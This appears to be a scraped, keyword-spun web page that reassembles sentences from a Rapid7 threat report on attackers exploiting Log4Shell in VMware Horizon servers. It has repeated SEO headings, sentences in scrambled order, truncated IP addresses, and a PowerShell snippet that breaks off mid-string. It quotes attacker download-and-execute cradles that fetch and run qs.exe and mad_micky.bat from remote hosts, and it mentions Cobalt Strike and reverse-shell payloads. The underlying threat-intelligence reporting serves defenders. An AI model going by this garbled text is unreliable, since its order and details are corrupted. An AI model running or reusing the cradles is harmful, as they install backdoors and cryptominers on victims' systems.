

- #Vmware horizon servers are exploit by update
- #Vmware horizon servers are exploit by software
- #Vmware horizon servers are exploit by trial
- #Vmware horizon servers are exploit by download
The same goes for other IT giants like IBM, Oracle, and Salesforce, as well as thousands of Internet-connected devices like televisions and security cameras. Cloud storage companies like Google, Amazon, and Microsoft, which are the digital hotline for millions of other applications, have been hit hard. Log4j is a logging framework for java applications and has been an integral part of many programs since the mid-1990s. Learn more about Log4j and this new threat in this Morphisec blog post. The fear of the Log4j security flaw has once again returned as threat actors have started to exploit vulnerable VMWare Horizon Servers. Countless millions of devices instantly became at risk of attack, and Log4j ranked among the worst vulnerabilities yet seen. $a="io:18765/qs.exe" $b="c:\windows\temp\qs.exe" $c = "c:\users\public\qs.On December 9th, 2021, reports surfaced about a new zero-day vulnerability, termed Log4j (Log4Shell), impacting Minecraft servers. The backdoor communicates with io:19969/index.php and will execute PowerShell commands received from that host. NGrok is a tool that allows a user to tunnel traffic through a NAT or firewall. In this instance, the actor is using ngrokio URLs.
#Vmware horizon servers are exploit by download
If this method fails, the PowerShell BitsTransfer object is used as a backup download method. One actor attempts to use to download a rudimentary backdoor from io:18765/qs.exe.
#Vmware horizon servers are exploit by trial
This backdoor was created using the trial version of Cobalt Strike, meaning it contains the EICAR anti-virus test string which should be identified by any AV vendor. Another actor has used it to download a Cobalt Strike backdoor from 116:8080/drv. The download cradle has also been used by one unknown actor to deploy a reverse shell based on Invoke-WebRev ( ) from 221:443/dd.ps1. $wc = New-Object $tempfile = ::GetTempFileName() $tempfile += '.bat' $wc.DownloadFile('135/mad_micky.bat', $tempfile) & $tempfile The following is an example PowerShell command from this activity (note that these contents were originally base64 encoded): TIDE has observed the attacker downloading cryptocurrency miners from the following URLs:
#Vmware horizon servers are exploit by software
The most common activity sees the attacker executing PowerShell and using the built-in object to download cryptocurrency mining software to the system. Rapid7’s Threat Intelligence and Detection Engineering (TIDE) team has identified five unique avenues that attackers have taken post-exploitation, indicating that multiple actors are involved in this mass exploitation activity. Organizations are advised to proactively block traffic to the IPs/URLs listed in the IOCs section. As a general practice, Rapid7 recommends never exposing VMware Horizon to the public internet, only allowing access behind a VPN.
#Vmware horizon servers are exploit by update
Patch Immediately: Organizations that still have a vulnerable version of VMware Horizon in their environment should update to a patched version of Horizon on an emergency basis and review the system(s) for signs of compromise. We have a dedicated resource page for the Log4j vulnerability, which includes our AttackerKB analysis of Log4Shell containing a proof-of-concept exploit for VMware Horizon. Rapid7 researchers are currently evaluating the feasibility of adding a VMware Horizon vulnerability check for Nexpose/InsightVM.

Detailsīeginning Friday, January 14, 2022, Rapid7 Managed Detection & Response (MDR) began monitoring a sudden increase in VMware Horizon exploitation. We’re sharing our observed activities and indicators of compromise (IOCs) related to this activity. This post is co-authored by Charlie Stafford, Lead Security Researcher.Īttackers are actively targeting VMware Horizon servers vulnerable to Apache Log4j CVE-2021-44228 (Log4Shell) and related vulnerabilities that were patched in December 2021. Post Syndicated from Glenn Thorpe original
